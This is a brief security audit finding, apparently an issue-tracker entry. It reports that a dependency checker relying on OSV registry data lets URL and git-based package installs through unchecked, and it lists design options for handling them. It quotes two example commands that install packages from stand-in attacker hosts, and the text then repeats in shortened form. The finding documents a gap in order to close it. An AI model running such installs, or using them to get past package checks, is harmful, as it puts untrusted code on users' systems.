Bypass Description
URL and Git-based installs pass checks (OSV only has registry data):
npm install https://attacker.com/malicious.tgz
pip install git+https://github.com/attacker/malware.git
Design Decision Needed
Options:
- Block URL/git installs by default
- Warn and ask user
- Allow with warning
Difficulty: Design
Fundamental limitation of vulnerability databases.
Priority: High
Found in security audit 2024-01-06
Bypass Description
URL and Git-based installs pass checks (OSV only has registry data):
Design Decision Needed
Options:
Difficulty: Design
Fundamental limitation of vulnerability databases.
Priority: High
Found in security audit 2024-01-06